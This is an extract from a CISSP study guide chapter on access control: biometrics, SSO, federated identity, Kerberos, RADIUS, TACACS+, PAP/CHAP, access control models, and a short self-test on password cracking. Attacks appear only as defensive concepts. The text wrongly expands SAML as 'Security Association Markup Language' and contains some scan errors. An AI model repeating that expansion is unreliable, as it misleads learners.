Retina scans are rarely used because of health risks and invasion-of-privacy issues. Alternatives 
should be considered for biometric controls that risk exchange of bodily fluid or raise legitimate 
privacy concerns. 


Iris Scan 

An iris scan is a passive biometric control. A camera takes a picture of the iris (the 
colored portion of the eye) and then compares photos within the authentication 
database. This also works through contact lenses and glasses. Each person’s two 
irises are unique, even twins’ irises. Benefits of iris scans include high-accuracy, 
passive scanning (which may be accomplished without the subject’s knowledge), and 
no exchange of bodily fluids. 

Hand Geometry 

In hand geometry biometric control, measurements are taken from specific points on 
the subject’s hand: “The devices use a simple concept of measuring and recording 
the length, width, thickness, and surface area of an individual’s hand while guided 
on a plate.” [8] Hand geometry devices are fairly simple, and can store information 
in as little as 9 bytes. 
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Keyboard Dynamics 

Keyboard dynamics refers to how hard a person presses each key and the rhythm by 
which the keys are pressed. Surprisingly, this type of access control is cheap to imple- 
ment and can be effective. As people learn how to type and use a computer keyboard, 
they develop specific habits that are difficult to impersonate, although not impossible. 

Dynamic Signature 

Dynamic signatures measure the process by which someone signs his/her name. 
This process is similar to keyboard dynamics, except that this method measures the 
handwriting of the subjects while they sign their name. Measuring time, pressure, 
loops in the signature, and beginning and ending points all help to ensure the user 
is authentic. 

Voiceprint 

A voiceprint measures the subject’s tone of voice while stating a specific sentence 
or phrase. This type of access control is vulnerable to replay attacks (replaying a 
recorded voice), so other access controls must be implemented along with the voice- 
print. One such control requires subjects to state random words, protecting against an 
attacker playing pre-recorded specific phrases. Another issue is people’s voices may 
substantially change due to illness, resulting in a false rejection. 

Facial Scan 

Facial scan technology has greatly improved over the last few years. Facial scan- 
ning (also called facial recognition) is the process of passively taking a picture of 
a subject’s face and comparing that picture to a list stored in a database. Although 
not frequently used for biometric authentication control due to the high cost, law 
enforcement and security agencies use facial recognition and scanning technologies 
for biometric identification to improve security of high-valued, publicly accessible 
targets. 

Superbowl XXXV was the first major sporting event that used facial recognition 
technology to look for potential terrorists [9]. Cameras were placed at every entrance 
and each attendee’s face was scanned and compared to a list of active terrorist threats. 
The technology worked and, although no terrorists were identified, 19 petty crimi- 
nals were identified. The companies that make the systems claim they are primarily 
a deterrent control. 


NOTE 

Casinos have used the same facial recognition technology as the Superbowl example since 2003. A 
casino’s biggest concern with regard to security is keeping the guests safe. However, a close second 
is ensuring that there are no cheaters stealing from the casino. Because cheaters have been known 
to wear elaborate disguises, more and more casinos are turning to facial recognition software. This 
software uses facial geometry to distinguish between faces. Because this geometry measures unique 
distances between facial features compared to the size of the face, no matter what the disguise, the 
software is likely to alert when it detects a known cheater stored within the database. 
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SOMEPLACE YOU ARE 

Someplace you are describes location-based access control using technologies such 
as the global positioning system (GPS), IP address-based geo-location, or the physi- 
cal location for a point-of-sale purchase. These controls can deny access if the sub- 
ject is in the incorrect location. Credit card companies employ this access control 
when monitoring a consumer’s activities for fraud. Many companies require that 
users notify them if they intend to travel abroad. If not, the credit card will most 
likely be declined for fear of unauthorized activity. 


ACCESS CONTROL TECHNOLOGIES 

There are several technologies used for the implementation of access controls. As 
each technology is presented, it is important to identify what is unique about each 
technical solution. 

CENTRALIZED ACCESS CONTROL 

Centralized access control concentrates access control in one logical point for a 
system or organization. Instead of using local access control databases, systems 
authenticate via third-party authentication servers. Centralized access control can 
be used to provide Single Sign-On (SSO), where a subject may authenticate once, 
and then access multiple systems. Centralized access control can centrally provide 
the three “A’s” of access control: Authentication, Authorization, and Accountability. 

• Authentication: proving an identity claim 

• Authorization: actions authenticated subjects are allowed to perform on a system 

• Accountability: the ability to audit a system and demonstrate the actions of 
subjects 


DECENTRALIZED ACCESS CONTROL 

Decentralized access control allows IT administration to occur closer to the mission 
and operations of the organization. In decentralized access control, an organization 
spans multiple locations, and the local sites support and maintain independent 
systems, access control databases, and data. Decentralized access control is also 
called distributed access control. 

This model provides more local power: each site has control over its data. This 
is empowering, but carries risks. Different sites may employ different access control 
models, different policies, and have different levels of security, leading to an incon- 
sistent view. Even organizations with a uniform policy may find that adherence varies 
per site. An attacker is likely to attack the weakest link in the chain: a small office 
with less trained staff makes a more tempting target than a central data center with 
experienced staff. 
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The U.S. military uses decentralized access control in battlefield situations. A soldier 
who needs access to IT equipment cannot call a help desk in the middle of a battle. 


EXAM WARNING 


Do not get confused on the CISSP® exam if asked about DAC compared to decentralized access 
control. DAC stands for discretionary access control. Decentralized access control will always be 
spelled out on the exam. 


SINGLE SIGN-ON (SSO) 

Single Sign-On (SSO) allows multiple systems to use a central authentication server 
(AS). This allows users to authenticate once, and then access multiple, different sys- 
tems. It also allows security administrators to add, change, or revoke user privileges 
on one central system. 

The advantages of SSO are listed below. As outlined in the IBM article, “Build 
and Implement a Single Sign-On Solution” by Chris Dunne, SSO is an important 
access control and can offer the following benefits: 

• “Improved user productivity. Users are no longer bogged down by multiple 
logins and they are not required to remember multiple IDs and passwords. Also, 
support personnel answer fewer requests to reset forgotten passwords.” 

• “Improved developer productivity. SSO provides developers with a common 
authentication framework. In fact, if the SSO mechanism is independent, then 
developers do not have to worry about authentication at all. They can assume 
that once a request for an application is accompanied by a username, then 
authentication has already taken place.” 

• “Simplified administration. When applications participate in a single sign-on 
protocol, the administration burden of managing user accounts is simplified. 

The degree of simplification depends on the applications since SSO only deals 
with authentication. So, applications may still require user-specific attributes 
(such as access privileges) to be set up.” 

The disadvantages of SSO are listed below and must be considered before imple- 
menting SSO on a system: 

• “Difficult to retrofit. An SSO solution can be difficult, time consuming, and 
expensive to retrofit to existing applications.” 

• “Unattended desktop. Implementing SSO reduces some security risks, but increases 
others. For example, a malicious user could gain access to a user’s resources if 

the user walks away from his machine and leaves it logged in. Although this is 
a problem with security in general, it is worse with SSO because all authorized 
resources are compromised. At least with multiple logons, the user may only be 
logged into one system at the time and so only one resource is compromised.” 

• “Single point of attack. With single sign-on, a single, central authentication 
service is used by all applications. This is an attractive target for hackers who 
may decide to carry out a denial of service attack.” [10] 
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Session Management of Single Sign On 

With great power comes responsibility: Single Sign On enables users to access a 
wealth of information with a single authentication. The risk of malicious access to 
those resources can increase with SSO, and this risk must be mitigated. See the 
“Unattended desktop” section of the quote from “Build and Implement a Single 
Sign-On Solution” shown in the previous section. 

SSO should always be combined with dual-factor authentication, but that still 
leaves the potential risk of malicious use of an existing session. For that reason: ses- 
sion timeouts and screensavers that automatically lock the workstation should be used. 
Users should also be trained to lock their workstation when they leave their desk. 


ACCESS PROVISIONING LIFECYCLE 

Once the proper access control model has been chosen and deployed, the access pro- 
visioning lifecycle must be maintained and secured. While many organizations follow 
best practices for issuing access, many lack formal processes for ensuring the entire life- 
time of access is kept secure as employees and contractors move within an organization. 
IBM describes the following identity lifecycle rules: 

• “Password policy compliance checking 

• Notifying users to change their passwords before they expire 

• Identifying life cycle changes such as accounts that are inactive for more than 
30 consecutive days 

• Identifying new accounts that have not been used for more than 10 days 
following their creation 

• Identifying accounts that are candidates for deletion because they have been 
suspended for more than 30 days 

• When a contract expires, identifying all accounts belonging to a business 
partner or contractor’s employees and revoking their access rights” [11] 

Always include account revocation as a required step in the access provision- 
ing lifecycle. This process should be tightly coordinated with the human resources 
department, and track not only terminations, but also horizontal and vertical moves 
or promotions within the organization. Additionally, as noted previously, inactive 
accounts should be targeted for revocation. 

User Entitlement, Access Review and Audit 

Access aggregation occurs as individual users gain more access to more systems. 
This can happen intentionally, as a function of Single Sign On (SSO). It can also 
happen unintentionally: users often gain new entitlements (also called access 
rights) as they take on new roles or duties. This can result in authorization creep : 
users gain more entitlements without shedding the old ones. The power of these 
entitlements can compound over time, defeating controls such as least privilege 
and separation of duties. User entitlements must be routinely reviewed and audited. 
Processes should be developed that reduce or eliminate old entitlements as new 
ones are granted. 
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According to the Institute of Internal Auditors Global Technology Audit Guide, 
“As part of the IAM (Identity and Access Management) process, entitlement 
management should be designed to initiate, modify, track, record, and terminate 
the entitlements or access permissions assigned to user accounts. Regardless of 
the methodology the organization employs to group user accounts into similar 
functions (e.g., work groups, roles, or profiles), entitlements for each user need to 
be managed properly. Therefore, the organization should conduct periodic reviews 
of access rights to detect situations where users accumulate entitlements as they 
move within the organization or where users are assigned improper entitlements. To 
accomplish reviews of access rights, business units need to request reports of access 
rights and communicate needed changes through the proper IAM mechanisms to 
the IT department.” [12] 

FEDERATED IDENTITY MANAGEMENT 

Federated Identity Management (FIdM) applies Single Sign On at a much wider 
scale: ranging from cross-organization to Internet scale. It is sometimes simply 
called Identity Management (IdM). 

According to EDUCAUSE, “Identity management refers to the policies, processes, 
and technologies that establish user identities and enforce rules about access to digital 
resources. In a campus setting, many information systems — such as e-mail, learning 
management systems, library databases, and grid computing applications — require 
users to authenticate themselves (typically with a username and password). An autho- 
rization process then determines which systems an authenticated user is permitted to 
access. With an enterprise identity management system, rather than having separate 
credentials for each system, a user can employ a single digital identity to access all 
resources to which the user is entitled. Federated identity management permits extending 
this approach above the enterprise level, creating a trusted authority for digital identi- 
ties across multiple organizations. In a federated system, participating institutions share 
identity attributes based on agreed-upon standards, facilitating authentication from other 
members of the federation and granting appropriate access to online resources. This 
approach streamlines access to digital assets while protecting restricted resources.” [13] 

SAML 

FIdM may use OpenID or SAML (Security Association Markup Language). SAML is 
an XML-based framework for exchanging security information, including authentica- 
tion data. As discussed in Chapter 4, Domain 3: Security Engineering: XML (Exten- 
sible Markup Language) is a markup language designed as a standard way to encode 
documents and data. One goal of SAML is to enable web single-sign on (SSO) at an 
Internet scale. Other forms of Single Sign On (SSO) also use SAML to exchange data. 

IDENTITY AS A SERVICE (IDaaS) 

With identity being a required pre-condition to effectively manage confidentiality, 
integrity, and availability, obviously identity plays a key role in security. Identity as 
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a Service (IDaaS), or cloud identity, allows organizations to leverage cloud service 
for identity management. The idea of leveraging public cloud services for identity 
management can be disconcerting. However, as with all matters of security, there are 
elements of cloud identity that can increase or decrease risk. 

One of the most significant justifications for leveraging IDaaS stems from organiza- 
tions continued adoption and integration of cloud hosted applications and other public 
facing 3rd party applications. Many of the IDaaS vendors can directly integrate with 
these services to allow for more streamlined identity management and single-sign on. 
Organizations already struggle with internal identity management and, particularly 
troubling, account/access revocation. These challenges are compounded when orga- 
nizations must also account for publicly accessible critical applications that are lever- 
aged by the workforce. Other commonly realized security benefits from integration 
with cloud identity providers include: easier deployment and integration of 2-factor 
or multi-factor authentication, self-service account management and password resets, 
better support for integrating mobile devices, and centralized audit capabilities. 

The rather obvious security question with IDaaS concerns the potentially in- 
creased exposure to an organization’s critical identity and authentication information. 
With traditional on-premise identity management solutions, the enterprise exerts 
control over securing the platform itself. With cloud identity, if the identity provider 
suffers a breach, then client organizations could well be devastated as a result. 

Microsoft Accounts, formerly Live ID, are an example of cloud identity increas- 
ingly found within many enterprises. 


EXAM WARNING 


On the exam, be careful not to confuse IaaS (Infrastructure as a Service, discussed in Chapter 4, 
Domain 3: Security Engineering) for IDaaS (Identity as a Service). 


CREDENTIAL MANAGEMENT SYSTEMS 

Legitimate credentials represent a high value target for adversaries. After initial 
exploitation, adversaries frequently seek and compromise credentials that can be 
used to pivot throughout the compromised network. Anything organizations can do 
to decrease the likelihood of credential compromise or limit the impact of credential 
compromise is a tremendous boon to security. 

Credential management systems can help harden user credentials in meaningful 
ways. Some of the features potentially offered by credential management systems 
include: secure password generation, secure password storage, credential check-in and 
check-out, automatic password rotation, reduction in the number of credentials users 
must remember, multifactor authentication to unlock credentials, and audit logging 
of all interactions. While the capabilities vary, credential management systems can 
play a vital role in helping to better secure these high value targets. 
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INTEGRATING THIRD-PARTY IDENTITY SERVICES 

While adoption of cloud identity, or IDaaS, is increasing, not all applications and ser- 
vices will be able to integrate with the IDaaS providers. Also, architecturally, many 
internal applications are deployed in a way that precludes easy interfacing with public 
facing cloud identity providers. Though not a perfect solution to the aforementioned 
challenges, one way to mitigate some of these issues is to deploy an on-premise 3rd 
party identity service. Leveraging an enterprise-hosted implementation of a 3rd party 
identity service can address some of the security and logistical challenges associated 
with the purely public-facing cloud identity services. 

An on-premise implementation of a 3rd party identity service can allow internal 
applications to integrate with a cloud identity. This might be possible even without 
necessarily having to fundamentally alter the security architecture of the applica- 
tions. Though this would depend upon implementation details, another benefit of 
moving to integrate 3rd party identity services is that it could allow for greater 
portability of the organization’s traditional on-premise identity solution. 

Deploying an enterprise-hosted instance of the identity services is far from the 
only way to integrate with 3rd party identity services. Another approach would be to 
deploy solutions that would allow the existing traditional on-premise identity provider 
to integrate with the cloud identity providers. This model is one way of federating 
the local organization’s identity, and could allow for the use of typical organizational 
credentials, which even unbeknownst to the end users are integrated with a cloud 
identity to allow greater portability of users’ identities. 


LDAP 

Lightweight Directory Access Protocol (LDAP) provides a common open protocol 
for interfacing and querying directory service information provided by network 
operating systems. LDAP is widely used for the overwhelming majority of internal 
identity services including, most notably, Active Directory. Directory services play 
a key role in many applications by exposing key user, computer, services, and other 
objects to be queried via LDAP. 

LDAP is an application layer protocol that uses port 389 via TCP or UDP. 
LDAP queries can be transmitted in cleartext and, depending upon configuration, 
can allow for some or all data to be queried anonymously. Naturally, LDAP does 
support for authenticated connections and also secure communication channels 
leveraging TLS. 


KERBEROS 

Kerberos is a third-party authentication service that may be used to support Single 
Sign-On. Kerberos (http://www.kerberos.org/) was the name of the three-headed dog 
that guarded the entrance to Hades (also called Cerberus) in Greek mythology. The 
three heads of the mythical Kerberos were meant to signify the three “A”s of AAA 
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systems: authentication, authorization, and accountability. In reality, the original 
Kerberos mainly provided authentication. Some now say that the three heads of Ker- 
beros represent the client, the KDC, and the server. 


EXAM WARNING 


Kerberos was developed under Project Athena at the Massachusetts Institute of Technology (MIT). 
Kerberos is extremely testable; it is best to learn how Kerberos works. 


The Kerberos FAQ (see http://www.faqs.org/faqs/kerberos-faq/user/) states: 
“Kerberos is a network authentication system for use on physically insecure 
networks, based on the key distribution model presented by Needham and 
Schroeder. It allows entities communicating over networks to prove their identity 
to each other while preventing eavesdropping or replay attacks. It also provides 
for data stream integrity (detection of modification) and secrecy (preventing 
unauthorized reading) using cryptography systems such as DES (Data Encryption 
Standard).” [14] 

Kerberos Characteristics 

Kerberos uses symmetric encryption and provides mutual authentication of both clients 
and servers. It protects against network sniffing and replay attacks. The current version 
of Kerberos is version 5, described by RFC 4120 (http://tools.ietf.org/html/rfc4120). 
Kerberos has the following components: 

• Principal. Client (user) or service 

• Realm: A logical Kerberos network 

• Ticket : Data that authenticates a principal’s identity 

• Credentials : a ticket and a service key 

• KDC: Key Distribution Center, which authenticates principals 

• TGS: Ticket Granting Service 

• TGT: Ticket Granting Ticket 

• C/S: Client/Server, regarding communications between the two 

Kerberos Operational Steps 

A Kerberos principal, a client run by user Alice, wishes to access a printer. Alice may 
print after taking these five (simplified) steps: 

1 . Kerberos Principal Alice contacts the KDC (Key Distribution Center, which acts 
as an authentication server), requesting authentication. 

2. The KDC sends Alice a session key, encrypted with Alice’s secret key. The KDC 
also sends a TGT (Ticket Granting Ticket), encrypted with the TGS’s secret key. 

3. Alice decrypts the session key and uses it to request permission to print from the 
TGS (Ticket Granting Service). 
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FIGURE 6.9 Kerberos Steps 


4. Seeing Alice has a valid session key (and therefore has proven her identity 
claim), the TGS sends Alice a C/S session key (second session key) to use to 
print. The TGS also sends a service ticket, encrypted with the printer’s key. 

5. Alice connects to the printer. The printer, seeing a valid C/S session key, knows 
Alice has permission to print, and also knows that Alice is authentic. 

This process is summarized in Figure 6.9. 

The session key in step 2 of Figure 6.9 is encrypted with Alice’s key (represented 
as “{Session Key | Key All “ ). Also note that the TGT is encrypted with the TGS’s key: 
Alice cannot decrypt the TGT (only the TGS can); she simply sends it to the TGS. The 
TGT contains a number of items, including a copy of Alice’s session key. This is how 
the TGS knows that Alice has a valid session key (which proves Alice is authenticated). 


NOTE 

Many sites run both the KDC and TGS services on one system, but they may be run on separate 
systems. It is helpful to think of them as independent systems for the exam. 


The TGT is good for a site-selected specific lifetime, often set to 10 hours (the 
length of a work day, plus a couple of hours). This allows a typical user to authen- 
ticate once, and access network resources for the lifetime of the ticket. Kerberos is 
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stateless for this reason: once Alice has a TGT, she may use it for its lifetime, even 
if the KDC goes offline. Also, the TGS can allow Alice to print without consulting 
the KDC: everything the TGS needs to know is contained in the traffic Alice sends, 
including the TGT and the first authenticator. 

The same is true for the service ticket Alice sends the printer. It is encrypted with 
the printer’s key, and contains a copy of the client/server session key. Alice cannot 
decrypt it, and simply passes it back to the printer. This allows the printer to make its 
decision based entirely on what Alice sends, without consulting the KDC or the TGS. 


NOTE 

This section (and the exam) describes “plain vanilla” Kerberos, not specific vendor 
implementations, such as Kerberos within Microsoft Windows Active Directory. 


Kerberos Strengths 

Kerberos provides mutual authentication of client and server. We have seen how the 
TGS and server (such as a printer) know that Principal Alice is authenticated. Alice also 
knows that the KDC is the real KDC. The real KDC knows both Alice’s and the TGS’s 
keys. If a rogue KDC pretended to be a real KDC, it would not have access to those keys. 
Figure 6. 10 shows steps 1 and 2 of Alice attempting to authenticate via a rogue KDC. 

The rogue KDC does not know Alice’s or the TGT’s keys. So it supplies garbage 
keys (“Key gar “ EC ). When Alice tries to decrypt the session key, she will get garbage, 
not a valid session key. Alice will then know the KDC is bogus. 

Kerberos mitigates replay attacks (where attackers sniff Kerberos credentials and 
replay them on the network) via the use of timestamps. Authenticators contain a 
timestamp, and the requested service will reject any authenticator that is too old 
(typically 5 minutes). Clocks on systems using Kerberos need to be synchronized for 
this reason: clock skew can invalidate authenticators. 

In addition to mutual authentication, Kerberos is stateless: any credentials issued by 
the KDC or TGS are good for the credential’s lifetime, even if the KDC or TGS go down. 

Kerberos Weaknesses 

The primary weakness of Kerberos is that the KDC stores the keys of all principals 
(clients and servers). A compromise of the KDC (physical or electronic) can lead to 
the compromise of every key in the Kerberos realm. 
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The KDC and TGS are also single points of failure: if they go down, no new 
credentials can be issued. Existing credentials may be used, but new authentication 
and service authorization will stop. 

Replay attacks are still possible for the lifetime of the authenticator. An attacker 
could sniff an authenticator, launch a denial-of-service attack against the client, and 
then assume or spoof the client’s IP address. 

In Kerberos 4, any user may request a session key for another user. So Eve may 
say, “Hi, I’m Alice and I want to authenticate.” The KDC would then send Eve a TGT 
and a session key encrypted with Alice’s key. Eve could then launch a local password 
guessing attack on the encrypted session key, attempting to guess Alice’s key. Kerbe- 
ros 5 added an extra step to mitigate this attack: in step 1 in Figure 6.9. Alice encrypts 
the current time with her key and sends that to the KDC. The KDC knows Alice is 
authentic (possesses her key), and then proceeds to step 2. 

Finally, Kerberos is designed to mitigate a malicious network: a sniffer will pro- 
vide little or no value. Kerberos does not mitigate a malicious local host: plaintext 
keys may exist in memory or cache. A malicious local user or process may be able to 
steal locally cached credentials. 


SESAME 

SESAME stands for Secure European System for Applications in a Multi-vendor 
Environment, a single sign-on system that supports heterogeneous environments. 
SESAME can be thought of as a sequel of sorts to Kerberos, “SESAME adds to 
Kerberos: heterogeneity, sophisticated access control features, scalability of public 
key systems, better manageability, audit and delegation.” [15] Of those improvements, 
the addition of public key (asymmetric) encryption is the most compelling. It address- 
es one of the biggest weaknesses in Kerberos: the plaintext storage of symmetric keys. 

SESAME uses Privilege Attribute Certificates (PACs) in place of Kerberos’ tick- 
ets. More information on SESAME is available at: https://www.cosic.esat.kuleuven. 
be/sesame/. 

ACCESS CONTROL PROTOCOLS AND FRAMEWORKS 

Both centralized and decentralized models may support remote users authenticating 
to local systems. A number of protocols and frameworks may be used to support 
this need, including RADIUS, Diameter, TACACS/TACACS +, PAP and CHAP, and 
Microsoft Active Directory. 

RADIUS 

The Remote Authentication Dial In User Service (RADIUS) protocol is a third-party 
authentication system. RADIUS is described in RFCs 2865 and 2866, and uses the 
User Datagram Protocol (UDP) ports 1812 (authentication) and 1813 (accounting). 
RADIUS formerly used the (unofficially assigned) ports of 1645 and 1646 for the 
same respective purposes; some implementations continue to use those ports. 
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RADIUS is considered a “AAA” system, comprised of three components: 
authentication, authorization, and accounting. It authenticates a subject’s credentials 
against an authentication database. It authorizes users by allowing specific users to 
access specific data objects. It accounts for each data session by creating a log entry 
for each RADIUS connection made. 

RADIUS request and response data is carried in Attribute Value Pairs (AVPs). 
According to RFC 2865 (http://tools.ietf.org/html/rfc2865), RADIUS supports the 
following codes: 

• Access-Request 

• Access-Accept 

• Access-Reject 

• Accounting-Request 

• Accounting-Response 

• Access-Challenge 

• Status-Server (experimental) 

• Status-Client (experimental) [16] 

Diameter 

Diameter is RADIUS’ successor, designed to provide an improved Authentica- 
tion, Authorization, and Accounting (AAA) framework. RADIUS provides limited 
accountability, and has problems with flexibility, scalability, reliability, and security. 
Diameter also uses Attribute Value Pairs, but supports many more: while RADIUS 
uses 8 bits for the AVP field (allowing 256 total possible AVPs), Diameter uses 32 
bits for the AVP field (allowing billions of potential AVPs). This makes Diameter 
more flexible, allowing support for mobile remote users, for example. 

Diameter uses a single server to manage policies for many services, as opposed to 
RADIUS that requires many servers to handle all of the secure connection protocols. 
Like RADIUS, Diameter provides AAA functionality, but in addition it is made more 
reliable by using the Transmission Control Protocol (TCP). Diameter is described by 
RFC 6733 (https://tools.ietf.org/html/rfc6733). 

TACACS and TACACS+ 

The Terminal Access Controller Access Control System (TACACS) is a centralized 
access control system that requires users to send an ID and static (reusable) password 
for authentication. TACACS uses UDP port 49 (and may also use TCP). Reusable 
passwords are a vulnerability: the improved TACACS+ provides better password pro- 
tection by allowing two-factor strong authentication. 

It is important to note that TACACS+ is not backwards compatible with 
TACACS. TACACS+ uses TCP port 49 for authentication with the TACACS+ 
server. The actual function of authentication is very similar to RADIUS, but there 
are some key differences. 

RADIUS only encrypts the password (leaving other data, such as username, 
unencrypted). TACACS+, on the other hand, encrypts all data below the TACACS+ 
header. This is an improvement over RADIUS and is more secure. 
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PAP and CHAP 

The Password Authentication Protocol (PAP) is defined by RFC 1334 (http://tools. 
ietf.org/html/rfc 1334#section-2) and is referred to as being, “not a strong authentica- 
tion method.” [17] A user enters a password and it is sent across the network in clear 
text. When received by the PAP server, it is authenticated and validated. Sniffing the 
network may disclose the plaintext passwords. Sniffing refers to monitoring network 
communications and capturing the raw TCP/IP traffic. 

The Challenge Handshake Authentication Protocol (CHAP) is defined by RFC 
1994 (http://tools.ietf.org/html/rfcl994) and provides protection against playback 
attacks. It uses a central location that challenges remote users. As stated in the 
RFC, “CHAP depends upon a ‘secret’ known only to the authenticator and the peer. 
The secret is not sent over the link. Although the authentication is only one-way, 
by negotiating CHAP in both directions the same secret set may easily be used for 
mutual authentication.” [18] 

The advantage of using CHAP over PAP is the additional security provided by the 
shared secret used during the challenge and response: a sniffer that views the entire 
challenge/response process will not be able to determine the shared secret. 

Microsoft Active Directory Domains 

Microsoft Windows Active Directory uses the concept of domains as the primary 
means to control access. For authentication purposes, Microsoft bases their authen- 
tication of trust relationships on RFC 1510, the Kerberos Authentication Protocol, 
and it has been integrated into Microsoft Windows operating systems since Windows 
2000. Each domain has a separate authentication process and space. Each domain 
may contain different users and different network assets and data objects. Because 
Microsoft Windows also uses the concept of groups to control access by users to data 
objects, each group may be granted access to various domains within the system. If 
a two-way trust between domains is created, then groups belonging to either domain 
may access data objects from each domain. 

As stated by Microsoft, “How a specific trust passes authentication requests 
depends on how it is configured; trust relationships can be one-way, providing 
access from the trusted domain to resources in the trusting domain, or two - way, 
providing access from each domain to resources in the other domain. Trusts are 
also either nontransitive, in which case trust exists only between the two trust 
partner domains, or transitive, in which case trust automatically extends to any 
other domains that either of the partners trusts.” [19] 


EXAM WARNING 


Microsoft trust relationships fall into two categories: non-transitive and transitive. Non- transitive 
trusts only exist between two trust partners. Transitive trusts exist between two partners and all of 
their partner domains. For example: if A trusts B, in a transitive trust, A will trust B and all of B’s 
trust partners. 
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ACCESS CONTROL MODELS 

Now that we have reviewed the cornerstone access control concepts, we can discuss the 
different access control models: the primary models are Discretionary Access Control 
(DAC), Mandatory Access Control (MAC), and Non-Discretionary Access Control. 

Do not think of one model being better than another. Instead, keep in mind that 
each model is used for a specific information security purpose. For example, if you 
had a weather Web site that required immediate data updates, but the information 
itself could have small errors in it (weather data is notoriously unreliable), the data 
integrity model would be different from a top secret database that had nuclear launch 
codes (it is VERY important that nuclear launch code data be both reliable AND kept 
highly confidential). 

DISCRETIONARY ACCESS CONTROLS (DAC) 

Discretionary Access Control (DAC) gives subjects full control of objects they have 
created or been given access to, including sharing the objects with other subjects. 
Subjects are empowered and control their data. Standard UNIX and Windows oper- 
ating systems use DAC for file systems: subjects can grant other subjects access to 
their files, change their attributes, alter them, or delete them. 

If a subject makes a mistake, such as attaching the wrong file to an email sent to a 
public mailing list, loss of confidentiality can result. Mistakes and malicious acts can 
also lead to a loss of integrity or availability of data. 

MANDATORY ACCESS CONTROLS (MAC) 

Mandatory Access Control (MAC) is system-enforced access control based on a sub- 
ject’s clearance and an object’s labels. Subjects and Objects have clearances and 
labels, respectively, such as confidential, secret, and top secret. A subject may access 
an object only if the subject’s clearance is equal to or greater than the object’s label. 
Subjects cannot share objects with other subjects who lack the proper clearance, 
or “write down” objects to a lower classification level (such as from top secret to 
secret). MAC systems are usually focused on preserving the confidentiality of data. 

Mandatory Access Control is expensive and difficult to implement, especially 
when attempting to separate differing confidentiality levels (security domains) with- 
in the same interconnected IT system. Clearing users is an expensive process; see the 
“Clearance” section in Chapter 3, Domain 2: Asset Security for more information. 
Specific MAC models, such as Bell-LaPadula, are discussed in Chapter 4, Domain 
3: Security Engineering. 

NON-DISCRETIONARY ACCESS CONTROL 

Role-Based Access Control (RBAC) defines how information is accessed on a system 
based on the role of the subject. A role could be a nurse, a backup administrator, a 
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Table 6.1 RBAC 


Role 

Example data access 

Basic user 

Desktop applications: email, spreadsheet, web access 

Auditor 

System security logs, authentication server logs 

Network Engineer 

Router logs, firewall logs, VPN concentrator logs 


help desk technician, etc. Subjects are grouped into roles and each defined role has 
access permissions based upon the role, not the individual. 

According to NIST, RBAC has the following rules: 

1 . “Role assignment: A subject can execute a transaction only if the subject has 
selected or been assigned a role. The identification and authentication process 
(e.g., login) is not considered a transaction. All other user activities on the 
system are conducted through transactions. Thus all active users are required to 
have some active role. 

2. Role authorization: A subject’s active role must be authorized for the subject. 
With (1) above, this rule ensures that users can take on only roles for which they 
are authorized. 

3. Transaction authorization: A subject can execute a transaction only if the 
transaction is authorized through the subject’s role memberships, and subject to 
any constraints that may be applied across users, roles, and permissions. With 
(1) and (2), this rule ensures that users can execute only transactions for which 
they are authorized.” [20] 

Even powerful roles have limitations; for example, many organizations do not 
allow system administrators to surf the Web while using the administrator account. 
This keeps each role separate on the system and reduces the exposure of more sensi- 
tive accounts. Table 6. 1 shows examples of differing data access based upon the role 
the user has on the system. 

RBAC is a type of non-discretionary access control because users do not have 
discretion regarding the groups of objects they are allowed to access, and are unable 
to transfer objects to other subjects. 


NOTE 

The three primary types of access control are Discretionary Access Control (DAC), Mandatory 
Access Control (MAC), and Non-Discretionary Access Control (such as RBAC). Some consider 
non-discretionary access control to be a form of MAC; others consider them separate. “As 
such, RBAC is sometimes described as a form of MAC in the sense that users are unavoidably 
constrained by and have no influence over the enforcement of the organization’s protection policies. 
However, RBAC is different from TCSEC (Orange Book) MAC.” [21] According to NIST, “RBAC 
is a separate and distinct model from MAC and DAC.” [22] This is a frequently confused (and 
argued) point: non-discretionary access control is not the same as MAC. 
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Task-based access control is another non-discretionary access control model, 
related to RBAC. Task-based access control is based on the tasks each subject must 
perform, such as writing prescriptions, or restoring data from a backup tape, or 
opening a help desk ticket. It attempts to solve the same problem that RBAC solves, 
focusing on specific tasks, instead of roles. 

RULE-BASED ACCESS CONTROLS 

As one would expect, a rule-based access control system uses a series of defined 
rules, restrictions, and filters for accessing objects within a system. The rules are in 
the form of “if/then” statements. An example of a rule-based access control device is 
a proxy firewall that allows users to surf the Web with predefined approved content 
only (“If the user is authorized to surf the Web, and the site is on the approved list, 
then allow access”). Other sites are prohibited and this rule is enforced across all 
authenticated users. 

CONTENT AND CONTEXT-DEPENDENT ACCESS CONTROLS 

Content and context-dependent access controls are not full-fledged access control 
methods in their own right (as MAC and DAC are), but typically play a defense-in- 
depth supporting role. They may be added as an additional control, typically to DAC 
systems. 

Content-dependent access control adds additional criteria beyond identifica- 
tion and authentication: the actual content the subject is attempting to access. All 
employees of an organization may have access to the HR database to view their 
accrued sick time and vacation time. Should an employee attempt to access the 
content of the CIO’s HR record, access is denied. 

Context-dependent access control applies additional context before granting 
access. A commonly used context is time. After identification and authentication, a 
help desk worker who works Monday-Friday from 9 AM to 5 PM will be granted 
access at noon on a Tuesday. A context-dependent access control system could 
deny access on Sunday at 1:00 AM (wrong time, and therefore wrong context). 


SUMMARY OF EXAM OBJECTIVES 

If one thinks of the castle analogy for security, access control would be the moat 
and castle walls. Identity and access management ensures that the border protection 
mechanisms, in both a logical and physical viewpoint, are secured. The purpose of 
access control is to allow authorized users access to appropriate data and deny 
access to unauthorized users — this is also known as limiting subjects’ access 
to objects. Even though this task is a complex and involved one, it is possible to 
implement a strong access control program without overburdening the users who 
rely on access to the system. 
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Protecting the CIA triad is another key aspect to implementing access controls. 
Maintaining confidentiality, integrity, and availability is of utmost importance. Main- 
taining security over the CIA of a system means enacting specific procedures for 
data access. These procedures will change depending on the functionality the users 
require and the sensitivity of the data stored on the system. 


SELF TEST 


NOTE 

Please see the Self Test Appendix for explanations of all correct and incorrect answers. 


1 . What type of password cracking attack will always be successful? 

A. Brute Force 

B. Dictionary 

C. Hybrid 

D. Rainbow Table 

2. What is the difference between password cracking and password guessing? 

A. They are the same 

B. Password guessing attempts to log into the system; password cracking 
attempts to determine a password used to create a hash 

C. Password guessing uses salts; password cracking does not 

D. Password cracking risks account lockout; password guessing does not 

3. Two users on the same system have the same password, but different hashes 
are stored in the /etc/shadow file. What is the most likely reason the hashes are 
different? 

A. The usernames are different, so the hashes will be different 

B. Use of multiple hashing algorithms 

C. Use of rainbow tables 

D. Use of salts 

